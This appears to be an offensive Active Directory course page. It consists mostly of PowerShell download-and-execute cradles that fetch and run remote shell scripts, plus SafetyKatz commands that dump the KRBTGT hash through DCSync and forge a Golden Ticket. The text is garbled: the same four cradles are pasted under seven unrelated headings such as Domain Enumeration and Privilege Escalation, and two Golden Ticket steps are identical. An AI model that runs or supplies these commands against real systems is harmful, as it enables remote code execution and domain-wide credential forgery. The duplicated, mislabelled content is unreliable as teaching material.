Advanced Active Directory Attack and Defense
The Advanced Active Directory Attack and Defense course is designed for cybersecurity professionals to deepen their knowledge of Active Directory (AD) security. It focuses on advanced attack techniques
- 1-Offensive Powershell
- 2-Offensive .NET
- 3-Tradecraft Payload Delivery
- 4-Domain Enumeration
- 5-Bypass EDRs – MDE
- 6-Privilege Escalation
- 7- Lateral Movement
- 8-Persistence
1-Offensive Powershell
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText2-Offensive .NET
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText3-Tradecraft Payload Delivery
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText4-Domain Enumeration
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText5-Bypass EDRs – MDE
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText6-Privilege Escalation
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText7- Lateral Movement
1-execute cradle
downloading a PowerShell script and executing it immediately is often referred to as an "execute cradle"
*** execute cradle ***
Method-1- :
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
Method-2- :
$ie=New-Object -ComObject InternetExplorer.Application
$ie.visible=$False
$ie.navigate('http://192.x.x.x/shell.ps1')
sleep 5
$response=$ie.Document.body.innerHTML
$ie.quit()
iex $response
Method-3- :
iex (iwr 'http://192.x.x.x/shell.ps1')
Method-4- :
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://192.x.x.x/shell.ps1',$false)
$h.send()
iex $h.responseText8-Persistence
1-Golden Ticket
A Golden Ticket attack is one of the most powerful techniques used by attackers when they have compromised the KRBTGT account, which is the service account used by the Kerberos Key Distribution Center (KDC).
1. Obtain the KRBTGT Hash:
A- Using SafetyKatz to Dump LSA Secrets: This requires the attacker to have administrator privileges on the Domain Controller
SafetyKatz.exe '"lsadump::lsa /patch"'
B- Using SafetyKatz to Perform DCSync :
SafetyKatz.exe '"lsadump::dcsync /user:us\krbtgt"'2. create a Golden Ticket for the Administrator account:
SafetyKatz.exe '"kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
3. Forge a Golden Ticket:
SafetyKatz.exe '"kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'